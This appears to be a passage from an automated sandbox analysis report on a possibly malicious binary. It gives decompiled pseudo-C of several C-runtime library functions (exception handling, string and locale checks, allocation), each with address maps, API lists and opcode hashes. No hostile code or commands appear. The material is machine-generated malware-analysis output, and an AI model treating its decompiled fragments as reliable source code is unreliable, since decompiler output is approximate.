                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • _memmove.LIBCMT ref: 0040D4B7
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040D477
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                    • String ID: invalid string position
                                                                    • API String ID: 1785806476-1799206989
                                                                    • Opcode ID: bd22108d18d33d12116784987b6e33b195e77cd1b729ba8a546bc855f1c3ad5f
                                                                    • Instruction ID: f835edf4ddad0b073003091dfb0d406edfea27db699740cec3ed7e7fd980f876
                                                                    • Opcode Fuzzy Hash: bd22108d18d33d12116784987b6e33b195e77cd1b729ba8a546bc855f1c3ad5f
                                                                    • Instruction Fuzzy Hash: 06018831B0061587C720CEACD9C081AB3FAAFC4704320493FD042D7689D738F94A8798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042260A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E0042260A(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E00420723(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00425F05(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00425F05(__ebx, __edx, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E004206FC(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E00422391(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                                                    0x0042260a
                                                                    0x0042260d
                                                                    0x00422613
                                                                    0x00422621
                                                                    0x00422627
                                                                    0x0042262f
                                                                    0x0042263b
                                                                    0x00422643
                                                                    0x0042264b
                                                                    0x0042265f
                                                                    0x00422661
                                                                    0x00422665
                                                                    0x0042266a
                                                                    0x00422670
                                                                    0x00422672
                                                                    0x00422674
                                                                    0x00422677
                                                                    0x00000000
                                                                    0x0042267e
                                                                    0x00422672
                                                                    0x00422665
                                                                    0x0042265f
                                                                    0x0042264b
                                                                    0x0042267f

                                                                    APIs
                                                                      • Part of subcall function 00420723: __getptd.LIBCMT ref: 00420729
                                                                      • Part of subcall function 00420723: __getptd.LIBCMT ref: 00420739
                                                                    • __getptd.LIBCMT ref: 00422619
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00422627
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                    • String ID: csm
                                                                    • API String ID: 803148776-1018135373
                                                                    • Opcode ID: 80c862e238cdda68283083831f96ccd92a1a34500a3e73630a0c5572abc7b0aa
                                                                    • Instruction ID: 6cd6d4e37892e37580fe1db1fe00afb759a92dc5fcc937b26e6efe26780afa7e
                                                                    • Opcode Fuzzy Hash: 80c862e238cdda68283083831f96ccd92a1a34500a3e73630a0c5572abc7b0aa
                                                                    • Instruction Fuzzy Hash: D5018B32A00221AECF349F21F640AAEB3B5EF20310F94046FE44056269CFB88D91CF49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00420A11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E00420A11(void* __ecx, signed int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v0;
				intOrPtr* _v28;
				intOrPtr _v32;
				void* _t22;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				signed int* _t34;
				signed int _t36;
				void* _t39;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t54;
				void* _t55;

				_t39 = __ecx;
				_t42 = 0;
				if(_a12 <= 0) {
					L5:
					return _t22;
				} else {
					_t2 =  &_a12; // 0x43553c
					_t48 = _t2;
					while(1) {
						_t48 = _t48 + 4;
						_t22 = E0042A89A(_a4, _a8,  *_t48);
						_t54 = _t54 + 0xc;
						if(_t22 != 0) {
							break;
						}
						_t42 = _t42 + 1;
						if(_t42 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L38;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004239B9();
					asm("int3");
					_push(0);
					_push(_t48);
					_push(_t42);
					_t44 = _v32;
					_t38 = 0;
					E00426300(_t44, 0, 0x90);
					_t49 = _v28;
					_t25 =  *_t49;
					_t55 = _t54 + 0xc;
					__eflags = _t25;
					if(_t25 != 0) {
						__eflags = _t25 - 0x2e;
						if(_t25 != 0x2e) {
							L15:
							_a4 = _t38;
							_t26 = E0041FDA0(_t39, _t49, "_.,");
							__eflags = _t26 - _t38;
							while(1) {
								_pop(_t39);
								if(__eflags == 0) {
									break;
								}
								__eflags = _a4;
								_t45 = _t26 + _t49;
								_t38 =  *_t45;
								if(_a4 != 0) {
									__eflags = _a4 - 1;
									if(_a4 != 1) {
										__eflags = _a4 - 2;
										if(_a4 != 2) {
											break;
										} else {
											__eflags = _t26 - 0x10;
											if(_t26 >= 0x10) {
												break;
											} else {
												__eflags = _t38;
												if(_t38 == 0) {
													L28:
													_push(_t26);
													_push(_t49);
													_push(0x10);
													_t29 = _v0 - 0xffffff80;
													__eflags = _t29;
													goto L29;
												} else {
													__eflags = _t38 - 0x2c;
													if(_t38 != 0x2c) {
														break;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										__eflags = _t26 - 0x40;
										if(_t26 >= 0x40) {
											break;
										} else {
											__eflags = _t38 - 0x5f;
											if(_t38 == 0x5f) {
												break;
											} else {
												_push(_t26);
												_push(_t49);
												_push(0x40);
												_t29 = _v0 + 0x40;
												L29:
												_push(_t29);
												goto L30;
											}
										}
									}
								} else {
									__eflags = _t26 - 0x40;
									if(_t26 >= 0x40) {
										break;
									} else {
										__eflags = _t38 - 0x2e;
										if(_t38 == 0x2e) {
											break;
										} else {
											_push(_t26);
											_push(_t49);
											_push(0x40);
											_push(_v0);
											L30:
											_t30 = E00429538();
											_t55 = _t55 + 0x10;
											__eflags = _t30;
											if(_t30 != 0) {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												goto L14;
											} else {
												__eflags = _t38 - 0x2c;
												if(_t38 == 0x2c) {
													goto L8;
												} else {
													__eflags = _t38;
													if(_t38 == 0) {
														goto L8;
													} else {
														_a4 = _a4 + 1;
														_t21 = _t45 + 1; // 0x1
														_t49 = _t21;
														_t26 = E0041FDA0(_t39, _t49, "_.,");
														__eflags = _t26;
														continue;
													}
												}
											}
										}
									}
								}
								goto L36;
							}
							_t27 = _t26 | 0xffffffff;
							__eflags = _t27;
						} else {
							_t8 = _t49 + 1; // 0x1
							_t34 = _t8;
							__eflags =  *_t34;
							if( *_t34 == 0) {
								goto L15;
							} else {
								_t9 = _t44 + 0x80; // 0x80
								_t36 = E00429538(_t9, 0x10, _t34, 0xf);
								_t55 = _t55 + 0x10;
								__eflags = _t36;
								if(_t36 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									L14:
									E004239B9();
									goto L15;
								} else {
									 *((char*)(_t44 + 0x8f)) = 0;
									goto L8;
								}
							}
						}
					} else {
						L8:
						_t27 = 0;
					}
					L36:
					return _t27;
				}
				L38:
			}






















                                                                    0x00420a11
                                                                    0x00420a1a
                                                                    0x00420a1f
                                                                    0x00420a43
                                                                    0x00420a46
                                                                    0x00420a21
                                                                    0x00420a22
                                                                    0x00420a22
                                                                    0x00420a25
                                                                    0x00420a25
                                                                    0x00420a30
                                                                    0x00420a35
                                                                    0x00420a3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00420a3c
                                                                    0x00420a40
                                                                    0x00000000
                                                                    0x00420a42
                                                                    0x00000000
                                                                    0x00420a42
                                                                    0x00000000
                                                                    0x00420a40
                                                                    0x00420a47
                                                                    0x00420a48
                                                                    0x00420a49
                                                                    0x00420a4a
                                                                    0x00420a4b
                                                                    0x00420a4c
                                                                    0x00420a51
                                                                    0x00420a57
                                                                    0x00420a58
                                                                    0x00420a59
                                                                    0x00420a5a
                                                                    0x00420a62
                                                                    0x00420a66
                                                                    0x00420a6b
                                                                    0x00420a6e
                                                                    0x00420a70
                                                                    0x00420a73
                                                                    0x00420a75
                                                                    0x00420a7e
                                                                    0x00420a80
                                                                    0x00420ab3
                                                                    0x00420ab9
                                                                    0x00420abc
                                                                    0x00420ac1
                                                                    0x00420b55
                                                                    0x00420b56
                                                                    0x00420b57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00420ac8
                                                                    0x00420acc
                                                                    0x00420acf
                                                                    0x00420ad1
                                                                    0x00420aea
                                                                    0x00420aee
                                                                    0x00420b06
                                                                    0x00420b0a
                                                                    0x00000000
                                                                    0x00420b0c
                                                                    0x00420b0c
                                                                    0x00420b0f
                                                                    0x00000000
                                                                    0x00420b11
                                                                    0x00420b11
                                                                    0x00420b13
                                                                    0x00420b1a
                                                                    0x00420b1a
                                                                    0x00420b1e
                                                                    0x00420b1f
                                                                    0x00420b21
                                                                    0x00420b21
                                                                    0x00000000
                                                                    0x00420b15
                                                                    0x00420b15
                                                                    0x00420b18
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00420b18
                                                                    0x00420b13
                                                                    0x00420b0f
                                                                    0x00420af0
                                                                    0x00420af0
                                                                    0x00420af3
                                                                    0x00000000
                                                                    0x00420af5
                                                                    0x00420af5
                                                                    0x00420af8
                                                                    0x00000000
                                                                    0x00420afa
                                                                    0x00420afa
                                                                    0x00420afe
                                                                    0x00420aff
                                                                    0x00420b01
                                                                    0x00420b24
                                                                    0x00420b24
                                                                    0x00000000
                                                                    0x00420b24
                                                                    0x00420af8
                                                                    0x00420af3
                                                                    0x00420ad3
                                                                    0x00420ad3
                                                                    0x00420ad6
                                                                    0x00000000
                                                                    0x00420adc
                                                                    0x00420adc
                                                                    0x00420adf
                                                                    0x00000000
                                                                    0x00420ae1
                                                                    0x00420ae1
                                                                    0x00420ae2
                                                                    0x00420ae3
                                                                    0x00420ae5
                                                                    0x00420b25
                                                                    0x00420b25
                                                                    0x00420b2a
                                                                    0x00420b2d
                                                                    0x00420b2f
                                                                    0x00420b67
                                                                    0x00420b68
                                                                    0x00420b69
                                                                    0x00420b6a
                                                                    0x00420b6b
                                                                    0x00000000
                                                                    0x00420b31
                                                                    0x00420b31
                                                                    0x00420b34
                                                                    0x00000000
                                                                    0x00420b3a
                                                                    0x00420b3a
                                                                    0x00420b3c
                                                                    0x00000000
                                                                    0x00420b42
                                                                    0x00420b42
                                                                    0x00420b45
                                                                    0x00420b45
                                                                    0x00420b4e
                                                                    0x00420b53
                                                                    0x00000000
                                                                    0x00420b53
                                                                    0x00420b3c
                                                                    0x00420b34
                                                                    0x00420b2f
                                                                    0x00420adf
                                                                    0x00420ad6
                                                                    0x00000000
                                                                    0x00420ad1
                                                                    0x00420b5d
                                                                    0x00420b5d
                                                                    0x00420a82
                                                                    0x00420a82
                                                                    0x00420a82
                                                                    0x00420a85
                                                                    0x00420a87
                                                                    0x00000000
                                                                    0x00420a89
                                                                    0x00420a8c
                                                                    0x00420a95
                                                                    0x00420a9a
                                                                    0x00420a9d
                                                                    0x00420a9f
                                                                    0x00420aa9
                                                                    0x00420aaa
                                                                    0x00420aab
                                                                    0x00420aac
                                                                    0x00420aad
                                                                    0x00420aae
                                                                    0x00420aae
                                                                    0x00000000
                                                                    0x00420aa1
                                                                    0x00420aa1
                                                                    0x00000000
                                                                    0x00420aa1
                                                                    0x00420a9f
                                                                    0x00420a87
                                                                    0x00420a77
                                                                    0x00420a77
                                                                    0x00420a77
                                                                    0x00420a77
                                                                    0x00420b60
                                                                    0x00420b64
                                                                    0x00420b64
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __invoke_watson_strcat_s
                                                                    • String ID: <UC
                                                                    • API String ID: 228796091-4197022941
                                                                    • Opcode ID: 4e961948464a8f77531ec4b236e122161e7f04dc228d8548b5ecd0139bbe3b52
                                                                    • Instruction ID: b90124ec2b4e3cba171f6c46be55adacba472da928b444e3b95940ccea777869
                                                                    • Opcode Fuzzy Hash: 4e961948464a8f77531ec4b236e122161e7f04dc228d8548b5ecd0139bbe3b52
                                                                    • Instruction Fuzzy Hash: 02E09273700229ABCB115E56FC4199B777AFFC0368B81443AFD1852102D6359A629694
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E00414893(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v20;
				void* _t7;
				void* _t12;
				void* _t17;

				_t7 = 0;
				if(__ecx != 0) {
					_t21 = __ecx - 0x9249249;
					if(__ecx > 0x9249249) {
						L3:
						_v8 = _v8 & 0x00000000;
						E0041DC00( &_v20,  &_v8);
						_v20 = 0x435264;
						return E0041FF86( &_v20, 0x440c30);
					}
					_t7 = E0041E24D(_t12, _t17, __edi, __esi, _t21, __ecx * 0x1c);
					if(0 == 0) {
						goto L3;
					}
				}
				return _t7;
			}








                                                                    0x00414899
                                                                    0x0041489d
                                                                    0x0041489f
                                                                    0x004148a5
                                                                    0x004148b5
                                                                    0x004148b5
                                                                    0x004148c0
                                                                    0x004148ce
                                                                    0x00000000
                                                                    0x004148d5
                                                                    0x004148ab
                                                                    0x004148b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004148b3
                                                                    0x004148db

                                                                    APIs
                                                                    • std::exception::exception.LIBCMT ref: 004148C0
                                                                    • __CxxThrowException@8.LIBCMT ref: 004148D5
                                                                      • Part of subcall function 0041E24D: _malloc.LIBCMT ref: 0041E267
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                    • String ID: dRC-cA
                                                                    • API String ID: 4063778783-2521504582
                                                                    • Opcode ID: 94b3183e8a8801c30e80c3482683423a11b4662fa2ec3b3f1be7f9196e92ac51
                                                                    • Instruction ID: 4d659d6e53ef5db25c334d1d2797d36fc85ff34a261341b4790aeaf922fe2f1d
                                                                    • Opcode Fuzzy Hash: 94b3183e8a8801c30e80c3482683423a11b4662fa2ec3b3f1be7f9196e92ac51
                                                                    • Instruction Fuzzy Hash: C0E0D87992024B96DB1CFBA5CD62AFFB6BC9F10308F60056F9001D1041EBB8D98487AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004171A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			E004171A6(void* __ebx, intOrPtr __ecx, void* __esi, void* __eflags) {
				void* _t24;
				void* _t27;

				_push(4);
				E004207D5(E00433B55, __ebx, _t24, __esi);
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x50)) + 4)) + __ecx - 0x50)) = 0x43f674;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				E00416C76(__ecx - 0x4c, _t24);
				_t10 =  *((intOrPtr*)(__ecx - 0x50)) + 4; // 0x0
				 *((intOrPtr*)( *_t10 + __ecx - 0x50)) = 0x43f624;
				return E00420874( *_t10);
			}





                                                                    0x004171a6
                                                                    0x004171ad
                                                                    0x004171b4
                                                                    0x004171bd
                                                                    0x004171c5
                                                                    0x004171cc
                                                                    0x004171d4
                                                                    0x004171d7
                                                                    0x004171e4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID: (sA$trA
                                                                    • API String ID: 431132790-3915461764
                                                                    • Opcode ID: 287cd1e5549fd9204a34cec1bdef57c8ee7073f69bccd15e7c270e9ffc394b3f
                                                                    • Instruction ID: ce6ae6e806d445d1c47f7e23111bb322584568090f38264761f7243577eb93c7
                                                                    • Opcode Fuzzy Hash: 287cd1e5549fd9204a34cec1bdef57c8ee7073f69bccd15e7c270e9ffc394b3f
                                                                    • Instruction Fuzzy Hash: 17E09A74A001548FE710DF49D145E48B7E0BB18309F85959EA5409B366DB78D909CB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%